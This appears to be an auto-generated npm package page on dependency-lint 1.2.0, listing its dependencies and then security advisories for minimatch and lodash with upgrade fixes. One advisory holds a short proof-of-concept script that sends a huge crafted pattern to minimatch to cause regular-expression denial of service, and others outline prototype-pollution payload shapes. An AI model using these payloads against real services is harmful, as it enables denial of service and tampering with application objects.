Dependency-lint is a valuable tool for JavaScript developers seeking to maintain clean and organized npm dependencies. Version 1.2.0 refines this linting process, building upon the solid foundation established in version 1.1.3. Both versions offer the core functionality of linting both dependencies and devDependencies within a project's package.json file, leveraging powerful tools like detective to analyze code and identify dependency issues. They share the same core dependencies: async, coffee-script, colors, detective, docopt, fs-extra, glob, and lodash, ensuring consistent performance in fundamental dependency handling. The developer tooling for both versions remains consistent as well with chai, chai-fs, coffeelint, cucumber, mycha, and tmp.
While functionally very similar, the update to version 1.2.0, released on February 17, 2015, after 1.1.3 released on February 16, 2015, suggests enhancements or bug fixes that improve the overall stability or efficiency of the library. Although the specific nature of these changes isn't explicitly detailed in the provided metadata, the update indicates a commitment to ongoing maintenance and refinement. Developers already using dependency-lint will likely benefit from upgrading to ensure they're running the most polished version. For new users, starting with version 1.2.0 is recommended to take advantage of any optimizations or bug fixes implemented since the previous stable release.
All the vulnerabilities related to the version 1.2.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.